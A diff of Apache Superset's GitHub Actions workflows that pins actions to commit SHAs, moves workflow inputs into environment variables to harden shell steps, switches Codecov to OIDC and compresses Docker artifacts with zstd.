+       uses: actions/cache@27d5ce7f107fe9357f9df03efb73ab90386fccae # v5
        with:
          path: ~/.npm # npm cache files are stored in `~/.npm` on Linux/macOS
          key: ${{ runner.OS }}-node-${{ hashFiles('**/package-lock.json') }}
@@ -62,7 +64,7 @@
        run: echo "dir=$(npm config get cache)" >> $GITHUB_OUTPUT
      - name: Cache npm
        if: env.HAS_TAGS
-       uses: actions/cache@v5
+       uses: actions/cache@27d5ce7f107fe9357f9df03efb73ab90386fccae # v5
        id: npm-cache # use this to check for `cache-hit` (`steps.npm-cache.outputs.cache-hit != 'true'`)
        with:
          path: ${{ steps.npm-cache-dir-path.outputs.dir }}
.github/workflows/showtime-trigger.yml (vendored, 18 changes)

@@ -37,7 +37,7 @@ jobs:
     steps:
       - name: Security Check - Authorize Maintainers Only
        id: auth
-       uses: actions/github-script@v8
+       uses: actions/github-script@3a2844b7e9c422d3c10d287c895573f7108da1b3 # v9.0.0
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        with:
@@ -102,10 +102,12 @@
      - name: Install Superset Showtime
        if: steps.auth.outputs.authorized == 'true'
        run: |
-         echo "::notice::Maintainer ${{ github.actor }} triggered deploy for PR ${{ github.event.pull_request.number || github.event.inputs.pr_number }}"
+         echo "::notice::Maintainer ${{ github.actor }} triggered deploy for PR ${PULL_REQUEST_NUMBER}"
          pip install --upgrade superset-showtime
          showtime version
+       env:
+         PULL_REQUEST_NUMBER: ${{ github.event.pull_request.number || github.event.inputs.pr_number }}
      - name: Check what actions are needed
        if: steps.auth.outputs.authorized == 'true'
        id: check
@@ -113,12 +115,14 @@
          AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
          AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+         INPUT_PR_NUMBER: ${{ github.event.inputs.pr_number }}
+         INPUT_SHA: ${{ github.event.inputs.sha }}
        run: |
          # Bulletproof PR number extraction
          if [[ -n "${{ github.event.pull_request.number }}" ]]; then
            PR_NUM="${{ github.event.pull_request.number }}"
-         elif [[ -n "${{ github.event.inputs.pr_number }}" ]]; then
-           PR_NUM="${{ github.event.inputs.pr_number }}"
+         elif [[ -n "${INPUT_PR_NUMBER}" ]]; then
+           PR_NUM="${INPUT_PR_NUMBER}"
          else
            echo "❌ No PR number found in event or inputs"
            exit 1
@@ -127,8 +131,8 @@
          echo "Using PR number: $PR_NUM"

          # Run sync check-only with optional SHA override
-         if [[ -n "${{ github.event.inputs.sha }}" ]]; then
-           OUTPUT=$(python -m showtime sync $PR_NUM --check-only --sha "${{ github.event.inputs.sha }}")
+         if [[ -n "${INPUT_SHA}" ]]; then
+           OUTPUT=$(python -m showtime sync $PR_NUM --check-only --sha "${INPUT_SHA}")
          else
            OUTPUT=$(python -m showtime sync $PR_NUM --check-only)
          fi
@@ -147,7 +151,7 @@
      - name: Checkout PR code (only if build needed)
        if: steps.auth.outputs.authorized == 'true' && steps.check.outputs.build_needed == 'true'
-       uses: actions/checkout@v6
+       uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
        with:
          ref: ${{ steps.check.outputs.target_sha }}
          persist-credentials: false
.github/workflows/superset-app-cli.yml (vendored, 2 changes)

@@ -37,7 +37,7 @@ jobs:
         - 16379:6379
     steps:
       - name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
-       uses: actions/checkout@v6
+       uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
        with:
          persist-credentials: false
          submodules: recursive
.github/workflows/superset-docs-deploy.yml (vendored, 14 changes)

@@ -27,10 +27,12 @@ jobs:
       id: check
       shell: bash
       run: |
-       if [ -n "${{ (secrets.SUPERSET_SITE_BUILD != '' && secrets.SUPERSET_SITE_BUILD != '') || '' }}" ]; then
+       if [ -n "${SUPERSET_SITE_BUILD}" ]; then
          echo "has-secrets=1" >> "$GITHUB_OUTPUT"
        fi
+     env:
+       SUPERSET_SITE_BUILD: ${{ (secrets.SUPERSET_SITE_BUILD != '' && secrets.SUPERSET_SITE_BUILD != '') || '' }}
   build-deploy:
     needs: config
     if: needs.config.outputs.has-secrets
@@ -38,18 +40,18 @@
     runs-on: ubuntu-24.04
     steps:
       - name: "Checkout ${{ github.event.workflow_run.head_sha || github.sha }}"
-       uses: actions/checkout@v6
+       uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
        with:
          ref: ${{ github.event.workflow_run.head_sha || github.sha }}
          persist-credentials: false
          submodules: recursive
      - name: Set up Node.js
-       uses: actions/setup-node@v6
+       uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6
        with:
          node-version-file: './docs/.nvmrc'
      - name: Setup Python
        uses: ./.github/actions/setup-backend/
-     - uses: actions/setup-java@v5
+     - uses: actions/setup-java@be666c2fcd27ec809703dec50e508c2fdc7f6654 # v5
        with:
          distribution: 'zulu'
          java-version: '21'
@@ -68,7 +70,7 @@
          yarn install --check-cache
      - name: Download database diagnostics (if triggered by integration tests)
        if: github.event_name == 'workflow_run' && github.event.workflow_run.conclusion == 'success'
-       uses: dawidd6/action-download-artifact@v16
+       uses: dawidd6/action-download-artifact@8305c0f1062bb0d184d09ef4493ecb9288447732 # v20
        continue-on-error: true
        with:
          workflow: superset-python-integrationtest.yml
@@ -77,7 +79,7 @@
          path: docs/src/data/
      - name: Try to download latest diagnostics (for push/dispatch triggers)
        if: github.event_name != 'workflow_run'
-       uses: dawidd6/action-download-artifact@v16
+       uses: dawidd6/action-download-artifact@8305c0f1062bb0d184d09ef4493ecb9288447732 # v20
        continue-on-error: true
        with:
          workflow: superset-python-integrationtest.yml
.github/workflows/superset-docs-verify.yml (vendored, 13 changes)

@@ -24,7 +24,7 @@ jobs:
     name: Link Checking
     runs-on: ubuntu-latest
     steps:
-     - uses: actions/checkout@v6
+     - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
      # Do not bump this linkinator-action version without opening
      # an ASF Infra ticket to allow the new version first!
      - uses: JustinBeckwith/linkinator-action@af984b9f30f63e796ae2ea5be5e07cb587f1bbd9 # v2.3
@@ -67,12 +67,12 @@
         working-directory: docs
     steps:
       - name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
-       uses: actions/checkout@v6
+       uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
        with:
          persist-credentials: false
          submodules: recursive
      - name: Set up Node.js
-       uses: actions/setup-node@v6
+       uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6
        with:
          node-version-file: './docs/.nvmrc'
      - name: yarn install
@@ -98,25 +98,26 @@
         working-directory: docs
     steps:
       - name: "Checkout PR head: ${{ github.event.workflow_run.head_sha }}"
-       uses: actions/checkout@v6
+       uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
        with:
          ref: ${{ github.event.workflow_run.head_sha }}
          persist-credentials: false
          submodules: recursive
      - name: Set up Node.js
-       uses: actions/setup-node@v6
+       uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6
        with:
          node-version-file: './docs/.nvmrc'
      - name: yarn install
        run: |
          yarn install --check-cache
      - name: Download database diagnostics from integration tests
-       uses: dawidd6/action-download-artifact@v16
+       uses: dawidd6/action-download-artifact@8305c0f1062bb0d184d09ef4493ecb9288447732 # v20
        with:
          workflow: superset-python-integrationtest.yml
          run_id: ${{ github.event.workflow_run.id }}
          name: database-diagnostics
          path: docs/src/data/
+         if_no_artifact_found: 'warning'
      - name: Use fresh diagnostics
        run: |
          if [ -f "src/data/databases-diagnostics.json" ]; then
.github/workflows/superset-e2e.yml (vendored, 20 changes)

@@ -69,21 +69,21 @@ jobs:
      # Conditional checkout based on context
      - name: Checkout for push or pull_request event
        if: github.event_name == 'push' || github.event_name == 'pull_request'
-       uses: actions/checkout@v6
+       uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
        with:
          persist-credentials: false
          submodules: recursive
          ref: ${{ github.event_name == 'pull_request' && github.event.pull_request.head.sha || github.sha }}
      - name: Checkout using ref (workflow_dispatch)
        if: github.event_name == 'workflow_dispatch' && github.event.inputs.ref != ''
-       uses: actions/checkout@v6
+       uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
        with:
          persist-credentials: false
          ref: ${{ github.event.inputs.ref }}
          submodules: recursive
      - name: Checkout using PR ID (workflow_dispatch)
        if: github.event_name == 'workflow_dispatch' && github.event.inputs.pr_id != ''
-       uses: actions/checkout@v6
+       uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
        with:
          persist-credentials: false
          ref: refs/pull/${{ github.event.inputs.pr_id }}/merge
@@ -109,7 +109,7 @@
        run: testdata
      - name: Setup Node.js
        if: steps.check.outputs.python || steps.check.outputs.frontend
-       uses: actions/setup-node@v6
+       uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6
        with:
          node-version-file: './superset-frontend/.nvmrc'
      - name: Install npm dependencies
@@ -146,7 +146,7 @@
          SAFE_APP_ROOT=${APP_ROOT//\//_}
          echo "safe_app_root=$SAFE_APP_ROOT" >> $GITHUB_OUTPUT
      - name: Upload Artifacts
-       uses: actions/upload-artifact@v7
+       uses: actions/upload-artifact@043fb46d1a93c77aae656e7c1c64a875d1fc6a0a # v7
        if: failure()
        with:
          path: ${{ github.workspace }}/superset-frontend/cypress-base/cypress/screenshots
@@ -186,21 +186,21 @@
      # Conditional checkout based on context (same as Cypress workflow)
      - name: Checkout for push or pull_request event
        if: github.event_name == 'push' || github.event_name == 'pull_request'
-       uses: actions/checkout@v6
+       uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
        with:
          persist-credentials: false
          submodules: recursive
          ref: ${{ github.event_name == 'pull_request' && github.event.pull_request.head.sha || github.sha }}
      - name: Checkout using ref (workflow_dispatch)
        if: github.event_name == 'workflow_dispatch' && github.event.inputs.ref != ''
-       uses: actions/checkout@v6
+       uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
        with:
          persist-credentials: false
          ref: ${{ github.event.inputs.ref }}
          submodules: recursive
      - name: Checkout using PR ID (workflow_dispatch)
        if: github.event_name == 'workflow_dispatch' && github.event.inputs.pr_id != ''
-       uses: actions/checkout@v6
+       uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
        with:
          persist-credentials: false
          ref: refs/pull/${{ github.event.inputs.pr_id }}/merge
@@ -226,7 +226,7 @@
        run: playwright_testdata
      - name: Setup Node.js
        if: steps.check.outputs.python || steps.check.outputs.frontend
-       uses: actions/setup-node@v6
+       uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6
        with:
          node-version-file: './superset-frontend/.nvmrc'
      - name: Install npm dependencies
@@ -259,7 +259,7 @@
          SAFE_APP_ROOT=${APP_ROOT//\//_}
          echo "safe_app_root=$SAFE_APP_ROOT" >> $GITHUB_OUTPUT
      - name: Upload Playwright Artifacts
-       uses: actions/upload-artifact@v7
+       uses: actions/upload-artifact@043fb46d1a93c77aae656e7c1c64a875d1fc6a0a # v7
        if: failure()
        with:
          path: |
@@ -24,7 +24,7 @@ jobs:
         working-directory: superset-extensions-cli
     steps:
       - name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
-       uses: actions/checkout@v6
+       uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
        with:
          persist-credentials: false
          submodules: recursive
@@ -49,7 +49,7 @@
      - name: Upload coverage reports to Codecov
        if: steps.check.outputs.superset-extensions-cli
-       uses: codecov/codecov-action@v5
+       uses: codecov/codecov-action@57e3a136b779b570ffcdbf80b3bdc90e7fab3de2 # v5
        with:
          file: ./coverage.xml
          flags: superset-extensions-cli
@@ -58,7 +58,7 @@
      - name: Upload HTML coverage report
        if: steps.check.outputs.superset-extensions-cli
-       uses: actions/upload-artifact@v7
+       uses: actions/upload-artifact@043fb46d1a93c77aae656e7c1c64a875d1fc6a0a # v7
        with:
          name: superset-extensions-cli-coverage-html
          path: htmlcov/
.github/workflows/superset-frontend.yml (35 changes)
@@ -23,7 +23,7 @@ jobs:
should-run: ${{ steps.check.outputs.frontend }}
steps:
- name: Checkout Code
- uses: actions/checkout@v6
+ uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
with:
persist-credentials: false
fetch-depth: 0
@@ -54,14 +54,14 @@ jobs:
- name: Save Docker Image as Artifact
if: steps.check.outputs.frontend
run: |
- docker save $TAG | gzip > docker-image.tar.gz
+ docker save $TAG | zstd -3 --threads=0 > docker-image.tar.zst

- name: Upload Docker Image Artifact
if: steps.check.outputs.frontend
- uses: actions/upload-artifact@v7
+ uses: actions/upload-artifact@043fb46d1a93c77aae656e7c1c64a875d1fc6a0a # v7
with:
name: docker-image
- path: docker-image.tar.gz
+ path: docker-image.tar.zst

sharded-jest-tests:
needs: frontend-build
@@ -73,12 +73,13 @@ jobs:
runs-on: ubuntu-24.04
steps:
- name: Download Docker Image Artifact
- uses: actions/download-artifact@v8
+ uses: actions/download-artifact@3e5f45b2cfb9172054b4087a40e8e0b5a5461e7c # v8
with:
name: docker-image

- name: Load Docker Image
- run: docker load < docker-image.tar.gz
+ run: |
+   zstd -d < docker-image.tar.zst | docker load

- name: npm run test with coverage
run: |
@@ -90,7 +91,7 @@ jobs:
"npm run test -- --coverage --shard=${{ matrix.shard }}/8 --coverageReporters=json"

- name: Upload Coverage Artifact
- uses: actions/upload-artifact@v7
+ uses: actions/upload-artifact@043fb46d1a93c77aae656e7c1c64a875d1fc6a0a # v7
with:
name: coverage-artifacts-${{ matrix.shard }}
path: superset-frontend/coverage
@@ -103,14 +104,14 @@ jobs:
id-token: write
steps:
- name: Checkout Code
- uses: actions/checkout@v6
+ uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
with:
persist-credentials: false
fetch-depth: 0
ref: ${{ github.event_name == 'pull_request' && github.event.pull_request.head.sha || github.sha }}

- name: Download Coverage Artifacts
- uses: actions/download-artifact@v8
+ uses: actions/download-artifact@3e5f45b2cfb9172054b4087a40e8e0b5a5461e7c # v8
with:
pattern: coverage-artifacts-*
path: coverage/
@@ -127,7 +128,7 @@ jobs:
run: npx nyc merge coverage/ merged-output/coverage-summary.json

- name: Upload Code Coverage
- uses: codecov/codecov-action@v5
+ uses: codecov/codecov-action@57e3a136b779b570ffcdbf80b3bdc90e7fab3de2 # v5
with:
flags: javascript
use_oidc: true
@@ -142,13 +143,13 @@ jobs:
runs-on: ubuntu-24.04
steps:
- name: Download Docker Image Artifact
- uses: actions/download-artifact@v8
+ uses: actions/download-artifact@3e5f45b2cfb9172054b4087a40e8e0b5a5461e7c # v8
with:
name: docker-image

- name: Load Docker Image
run: |
- docker load < docker-image.tar.gz
+ zstd -d < docker-image.tar.zst | docker load

- name: lint
run: |
@@ -166,12 +167,13 @@ jobs:
runs-on: ubuntu-24.04
steps:
- name: Download Docker Image Artifact
- uses: actions/download-artifact@v8
+ uses: actions/download-artifact@3e5f45b2cfb9172054b4087a40e8e0b5a5461e7c # v8
with:
name: docker-image

- name: Load Docker Image
- run: docker load < docker-image.tar.gz
+ run: |
+   zstd -d < docker-image.tar.zst | docker load

- name: Build Plugins Packages
run: |
@@ -184,12 +186,13 @@ jobs:
runs-on: ubuntu-24.04
steps:
- name: Download Docker Image Artifact
- uses: actions/download-artifact@v8
+ uses: actions/download-artifact@3e5f45b2cfb9172054b4087a40e8e0b5a5461e7c # v8
with:
name: docker-image

- name: Load Docker Image
- run: docker load < docker-image.tar.gz
+ run: |
+   zstd -d < docker-image.tar.zst | docker load

- name: Build Storybook and Run Tests
run: |
.github/workflows/superset-helm-lint.yml (4 changes)
@@ -16,14 +16,14 @@ jobs:
runs-on: ubuntu-24.04
steps:
- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
- uses: actions/checkout@v6
+ uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
with:
persist-credentials: false
submodules: recursive
fetch-depth: 0

- name: Set up Helm
- uses: azure/setup-helm@v4
+ uses: azure/setup-helm@dda3372f752e03dde6b3237bc9431cdc2f7a02a2 # v5.0.0
with:
version: v3.16.4
.github/workflows/superset-helm-release.yml (6 changes)
@@ -29,7 +29,7 @@ jobs:

steps:
- name: Checkout code
- uses: actions/checkout@v6
+ uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
with:
ref: ${{ inputs.ref || github.ref_name }}
persist-credentials: true
@@ -42,7 +42,7 @@ jobs:
git config user.email "$GITHUB_ACTOR@users.noreply.github.com"

- name: Install Helm
- uses: azure/setup-helm@v4
+ uses: azure/setup-helm@dda3372f752e03dde6b3237bc9431cdc2f7a02a2 # v5.0.0
with:
version: v3.5.4

@@ -101,7 +101,7 @@ jobs:
CR_RELEASE_NAME_TEMPLATE: "superset-helm-chart-{{ .Version }}"

- name: Open Pull Request
- uses: actions/github-script@v8
+ uses: actions/github-script@3a2844b7e9c422d3c10d287c895573f7108da1b3 # v9.0.0
with:
script: |
const branchName = '${{ env.branch_name }}';
.github/workflows/superset-playwright.yml (10 changes)
@@ -60,21 +60,21 @@ jobs:
# Conditional checkout based on context (same as Cypress workflow)
- name: Checkout for push or pull_request event
if: github.event_name == 'push' || github.event_name == 'pull_request'
- uses: actions/checkout@v6
+ uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
with:
persist-credentials: false
submodules: recursive
ref: ${{ github.event_name == 'pull_request' && github.event.pull_request.head.sha || github.sha }}
- name: Checkout using ref (workflow_dispatch)
if: github.event_name == 'workflow_dispatch' && github.event.inputs.ref != ''
- uses: actions/checkout@v6
+ uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
with:
persist-credentials: false
ref: ${{ github.event.inputs.ref }}
submodules: recursive
- name: Checkout using PR ID (workflow_dispatch)
if: github.event_name == 'workflow_dispatch' && github.event.inputs.pr_id != ''
- uses: actions/checkout@v6
+ uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
with:
persist-credentials: false
ref: refs/pull/${{ github.event.inputs.pr_id }}/merge
@@ -100,7 +100,7 @@ jobs:
run: playwright_testdata
- name: Setup Node.js
if: steps.check.outputs.python || steps.check.outputs.frontend
- uses: actions/setup-node@v6
+ uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6
with:
node-version-file: './superset-frontend/.nvmrc'
- name: Install npm dependencies
@@ -133,7 +133,7 @@ jobs:
SAFE_APP_ROOT=${APP_ROOT//\//_}
echo "safe_app_root=$SAFE_APP_ROOT" >> $GITHUB_OUTPUT
- name: Upload Playwright Artifacts
- uses: actions/upload-artifact@v7
+ uses: actions/upload-artifact@043fb46d1a93c77aae656e7c1c64a875d1fc6a0a # v7
if: failure()
with:
path: |
@@ -16,6 +16,8 @@ concurrency:
jobs:
test-mysql:
runs-on: ubuntu-24.04
+ permissions:
+   id-token: write
env:
PYTHONPATH: ${{ github.workspace }}
SUPERSET_CONFIG: tests.integration_tests.superset_test_config
@@ -41,7 +43,7 @@ jobs:
- 16379:6379
steps:
- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
- uses: actions/checkout@v6
+ uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
with:
persist-credentials: false
submodules: recursive
@@ -68,11 +70,12 @@ jobs:
run: |
./scripts/python_tests.sh
- name: Upload code coverage
- uses: codecov/codecov-action@v5
+ uses: codecov/codecov-action@57e3a136b779b570ffcdbf80b3bdc90e7fab3de2 # v5
with:
flags: python,mysql
- token: ${{ secrets.CODECOV_TOKEN }}
verbose: true
+ use_oidc: true
+ slug: apache/superset
- name: Generate database diagnostics for docs
if: steps.check.outputs.python
env:
@@ -98,13 +101,15 @@ jobs:
"
- name: Upload database diagnostics artifact
if: steps.check.outputs.python
- uses: actions/upload-artifact@v7
+ uses: actions/upload-artifact@043fb46d1a93c77aae656e7c1c64a875d1fc6a0a # v7
with:
name: database-diagnostics
path: databases-diagnostics.json
retention-days: 7
test-postgres:
runs-on: ubuntu-24.04
+ permissions:
+   id-token: write
strategy:
matrix:
python-version: ["current", "previous", "next"]
@@ -129,7 +134,7 @@ jobs:
- 16379:6379
steps:
- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
- uses: actions/checkout@v6
+ uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
with:
persist-credentials: false
submodules: recursive
@@ -159,14 +164,17 @@ jobs:
run: |
./scripts/python_tests.sh
- name: Upload code coverage
- uses: codecov/codecov-action@v5
+ uses: codecov/codecov-action@57e3a136b779b570ffcdbf80b3bdc90e7fab3de2 # v5
with:
flags: python,postgres
- token: ${{ secrets.CODECOV_TOKEN }}
verbose: true
+ use_oidc: true
+ slug: apache/superset

test-sqlite:
runs-on: ubuntu-24.04
+ permissions:
+   id-token: write
env:
PYTHONPATH: ${{ github.workspace }}
SUPERSET_CONFIG: tests.integration_tests.superset_test_config
@@ -182,7 +190,7 @@ jobs:
- 16379:6379
steps:
- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
- uses: actions/checkout@v6
+ uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
with:
persist-credentials: false
submodules: recursive
@@ -211,8 +219,9 @@ jobs:
run: |
./scripts/python_tests.sh
- name: Upload code coverage
- uses: codecov/codecov-action@v5
+ uses: codecov/codecov-action@57e3a136b779b570ffcdbf80b3bdc90e7fab3de2 # v5
with:
flags: python,sqlite
- token: ${{ secrets.CODECOV_TOKEN }}
verbose: true
+ use_oidc: true
+ slug: apache/superset
@@ -17,6 +17,8 @@ concurrency:
jobs:
test-postgres-presto:
runs-on: ubuntu-24.04
+ permissions:
+   id-token: write
env:
PYTHONPATH: ${{ github.workspace }}
SUPERSET_CONFIG: tests.integration_tests.superset_test_config
@@ -48,7 +50,7 @@ jobs:
- 16379:6379
steps:
- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
- uses: actions/checkout@v6
+ uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
with:
persist-credentials: false
submodules: recursive
@@ -77,14 +79,17 @@ jobs:
run: |
./scripts/python_tests.sh -m 'chart_data_flow or sql_json_flow'
- name: Upload code coverage
- uses: codecov/codecov-action@v5
+ uses: codecov/codecov-action@57e3a136b779b570ffcdbf80b3bdc90e7fab3de2 # v5
with:
flags: python,presto
- token: ${{ secrets.CODECOV_TOKEN }}
verbose: true
+ use_oidc: true
+ slug: apache/superset

test-postgres-hive:
runs-on: ubuntu-24.04
+ permissions:
+   id-token: write
env:
PYTHONPATH: ${{ github.workspace }}
SUPERSET_CONFIG: tests.integration_tests.superset_test_config
@@ -108,7 +113,7 @@ jobs:
- 16379:6379
steps:
- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
- uses: actions/checkout@v6
+ uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
with:
persist-credentials: false
submodules: recursive
@@ -145,8 +150,9 @@ jobs:
pip install -e .[hive]
./scripts/python_tests.sh -m 'chart_data_flow or sql_json_flow'
- name: Upload code coverage
- uses: codecov/codecov-action@v5
+ uses: codecov/codecov-action@57e3a136b779b570ffcdbf80b3bdc90e7fab3de2 # v5
with:
flags: python,hive
- token: ${{ secrets.CODECOV_TOKEN }}
verbose: true
+ use_oidc: true
+ slug: apache/superset
@@ -17,6 +17,8 @@ concurrency:
jobs:
unit-tests:
runs-on: ubuntu-24.04
+ permissions:
+   id-token: write
strategy:
matrix:
python-version: ["previous", "current", "next"]
@@ -24,7 +26,7 @@ jobs:
PYTHONPATH: ${{ github.workspace }}
steps:
- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
- uses: actions/checkout@v6
+ uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
with:
persist-credentials: false
submodules: recursive
@@ -53,8 +55,9 @@ jobs:
run: |
pytest --durations-min=0.5 --cov=superset/sql/ ./tests/unit_tests/sql/ --cache-clear --cov-fail-under=100
- name: Upload code coverage
- uses: codecov/codecov-action@v5
+ uses: codecov/codecov-action@57e3a136b779b570ffcdbf80b3bdc90e7fab3de2 # v5
with:
flags: python,unit
- token: ${{ secrets.CODECOV_TOKEN }}
verbose: true
+ use_oidc: true
+ slug: apache/superset
.github/workflows/superset-translations.yml (10 changes)
@@ -18,7 +18,7 @@ jobs:
runs-on: ubuntu-24.04
steps:
- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
- uses: actions/checkout@v6
+ uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
with:
persist-credentials: false
submodules: recursive
@@ -31,7 +31,7 @@ jobs:

- name: Setup Node.js
if: steps.check.outputs.frontend
- uses: actions/setup-node@v6
+ uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6
with:
node-version-file: './superset-frontend/.nvmrc'
- name: Install dependencies
@@ -49,7 +49,7 @@ jobs:
runs-on: ubuntu-24.04
steps:
- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
- uses: actions/checkout@v6
+ uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
with:
persist-credentials: false
submodules: recursive
@@ -62,6 +62,10 @@ jobs:
- name: Setup Python
if: steps.check.outputs.python
uses: ./.github/actions/setup-backend/

+ - name: Install msgcat
+   run: sudo apt update && sudo apt install gettext

- name: Test babel extraction
if: steps.check.outputs.python
run: ./scripts/translations/babel_update.sh
.github/workflows/superset-websocket.yml (2 changes)
@@ -21,7 +21,7 @@ jobs:
runs-on: ubuntu-24.04
steps:
- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
- uses: actions/checkout@v6
+ uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
with:
persist-credentials: false
- name: Install dependencies
.github/workflows/supersetbot.yml (4 changes)
@@ -26,7 +26,7 @@ jobs:
steps:
- name: Quickly add thumbs up!
if: github.event_name == 'issue_comment' && contains(github.event.comment.body, '@supersetbot')
- uses: actions/github-script@v8
+ uses: actions/github-script@3a2844b7e9c422d3c10d287c895573f7108da1b3 # v9.0.0
with:
script: |
const [owner, repo] = process.env.GITHUB_REPOSITORY.split('/')
@@ -38,7 +38,7 @@ jobs:
});

- name: "Checkout ( ${{ github.sha }} )"
- uses: actions/checkout@v6
+ uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
with:
persist-credentials: false
.github/workflows/tag-release.yml (24 changes)
@@ -31,10 +31,12 @@ jobs:
id: check
shell: bash
run: |
- if [ -n "${{ (secrets.DOCKERHUB_USER != '' && secrets.DOCKERHUB_TOKEN != '') || '' }}" ]; then
+ if [ -n "${DOCKERHUB_USER}" ]; then
echo "has-secrets=1" >> "$GITHUB_OUTPUT"
fi

+ env:
+   DOCKERHUB_USER: ${{ (secrets.DOCKERHUB_USER != '' && secrets.DOCKERHUB_TOKEN != '') || '' }}
docker-release:
needs: config
if: needs.config.outputs.has-secrets
@@ -47,7 +49,7 @@ jobs:
steps:

- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
- uses: actions/checkout@v6
+ uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
with:
fetch-depth: 0

@@ -60,7 +62,7 @@ jobs:
build: "true"

- name: Use Node.js 20
- uses: actions/setup-node@v6
+ uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6
with:
node-version: 20

@@ -72,17 +74,20 @@ jobs:
DOCKERHUB_USER: ${{ secrets.DOCKERHUB_USER }}
DOCKERHUB_TOKEN: ${{ secrets.DOCKERHUB_TOKEN }}
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+ INPUT_RELEASE: ${{ github.event.inputs.release }}
+ INPUT_FORCE_LATEST: ${{ github.event.inputs.force-latest }}
+ INPUT_GIT_REF: ${{ github.event.inputs.git-ref }}
run: |
RELEASE="${{ github.event.release.tag_name }}"
FORCE_LATEST=""
EVENT="${{github.event_name}}"
if [ "${{ github.event_name }}" = "workflow_dispatch" ]; then
# in the case of a manually-triggered run, read release from input
- RELEASE="${{ github.event.inputs.release }}"
+ RELEASE="${INPUT_RELEASE}"
- if [ "${{ github.event.inputs.force-latest }}" = "true" ]; then
+ if [ "${INPUT_FORCE_LATEST}" = "true" ]; then
FORCE_LATEST="--force-latest"
fi
- git checkout "${{ github.event.inputs.git-ref }}"
+ git checkout "${INPUT_GIT_REF}"
EVENT="release"
fi

@@ -107,12 +112,12 @@ jobs:
steps:

- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
- uses: actions/checkout@v6
+ uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
with:
fetch-depth: 0

- name: Use Node.js 20
- uses: actions/setup-node@v6
+ uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6
with:
node-version: 20

@@ -122,6 +127,7 @@ jobs:
- name: Label the PRs with the right release-related labels
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+ INPUT_RELEASE: ${{ github.event.inputs.release }}
run: |
export GITHUB_ACTOR=""
git fetch --all --tags
@@ -129,6 +135,6 @@ jobs:
RELEASE="${{ github.event.release.tag_name }}"
if [ "${{ github.event_name }}" = "workflow_dispatch" ]; then
# in the case of a manually-triggered run, read release from input
